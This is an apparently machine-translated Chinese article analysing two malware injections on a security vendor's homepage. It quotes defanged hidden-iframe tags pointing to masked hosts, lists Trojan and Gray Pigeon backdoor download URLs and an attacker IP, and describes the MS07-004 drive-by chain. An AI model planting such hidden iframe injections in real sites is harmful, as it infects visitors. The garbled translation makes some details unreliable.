Who can ensure the security of the website?

Editor's note: For security reasons, "http" is replaced with "hxxp", and "<>" is replaced .]

Two days ago, some netizens reported that Dongfang guard, a well-known security website in China, was mounted with a Trojan again. This is the second time that Dongfang guard has revealed a security risk.

Review

Before that, a malicious code reference event has occurred on the home page hxxp: // www.i110.com) of the eastern guardian website. if the user has not installed Microsoft's MS07-004 patch, when you access the preceding page using IE, the webpage will be infected with the Trojan horse.

Technical analysis:

1. The Home Page code of the Oriental guardian website contains a reference statement for a malicious webpage:

[iframe src=hxxp://***.ch/ook.html width=0 height=0][/iframe]

1:

Figure 1

2. the referenced malicious web page contains code that exploits the MS07-004 vulnerability, allowing the system to automatically download hxxp ://***. ch/xia.exe Trojan-Downloader.Win32.agent.ddz) to local and run.

Run the command to download the gray pigeon virus hxxp: // ***. li/2.exe Backdoor. Win32.Hupigon. cardiopulmonary bypass ).

4.2.exe is the latest variant of the gray pigeon virus. It is written using RootKit Technology to hide the process. After the virus is run, the file is released to % WinDir % \ svchost.exe. The file size is 381440 bytes and the following service is created:

Service name: Net work nois Service Description: Net work nois service program: C: \ WINNT \ svchost.exe

In addition, hxxp: // lxn2wyf8899.3322.org/ip.txtwill be downloaded to the ghost system directory. Ip.txt contains the following content:

Hxxp: // 221.215.170.192: 5600/wwwroot/the IP address is: Shandong Qingdao (licang district) Netcom ADSL)

Infected computers will be remotely controlled by hackers. These operations may be arbitrary file operations, registry operations, key records, downloading and executing remote programs, any network operations, or even remote camera monitoring.

Trojan again

This time, on the home page of dongfangguard, you can view the source code of the page and see that a "[iframe src =" command is inserted into the webpage. This command will hide and open a new page, this page spoofs an error webpage that cannot be opened by the browser and hides three pages in the background to download Trojans.

Hidden Page code:

[iframe src=hxxp://www.****.cn/33/Reflector/index.htm width=0 height=0 frameborder=0][/iframe]

On the forged error page, three webpages are opened:

[iframe src="hxxp://www.****.cn/33/Reflector/4.htm" width="0" height="0" frameborder="0"][/iframe][iframe src="hxxp://www.****.cn/33/Reflector/2.htm" width="0" height="0" frameborder="0"][/iframe][iframe src="hxxp://www.*****.com/wm/20/5.htm" width="0" height="0" frameborder="0"][/iframe]

Download Trojan:

Hxxp: // www. *****. cn/33/Reflector/1.exe invalid) hxxp: // www. ******. com/0.exe

Figure 2

Figure 3

Whether or not there will be another three or four

We often say "two more times, three more than four ". As a protection pioneer, security websites have a high level of credibility and influence in users' minds. Any negligence brings much greater harm than the damage caused by Trojan viruses. After the first occurrence of a website Trojan, I believe that the Eastern defender has taken appropriate measures. But the trojan event can happen again, which requires our vigilance and reflection.

Again, it means that in the fight between the "Spear" and "shield", the "Spear" once again prevails. In addition to the vulnerabilities that have not yet been discovered by the system, its website security monitoring should also have certain and usable defects.

In previous articles, we mentioned that due to CNN's failure to promptly update its anti-virus software, it was attacked by a worm that could have been detected in a timely manner. The "Spear" and "shield" always coexist. It is impossible for one to completely overlay the other. Either the two to coexist or disappear. That is to say, the occurrence of the second Trojan event is not only because of the emergence of a new "Spear", but also because of the previous vulnerability in the "shield", giving the "Spear" a chance.

If something happens, the problem is not terrible. We are afraid that we do not know how the problem occurs. What we fear is that we do not know how to prevent and avoid the problem from happening again.

A secure website represents not only a company or a group, but also the forefront of the network security struggle. When it cannot guarantee its own security, it also allows ordinary users to face the increasingly dangerous online world, it also allows common users to know who else can help them resist network threat intrusion.

Who else can we trust when a security website is knocked down! Who can ensure the security of websites?

Related Materials

MS07-004 Vulnerability: Multiple versions of the operating system of Microsoft Support Vector Markup Language (VML) have integer overflow, which allows attackers to execute arbitrary commands, so that remote attackers can exploit this vulnerability to control user machines.

Eastern GUARD:Jiaotong mingtai Information Security Company, a well-known information security manufacturer in China, the company provides Anti-Virus products, data protection, non-toxic gateway products, anti-spam products, network equipment and system integration and OEM customized services.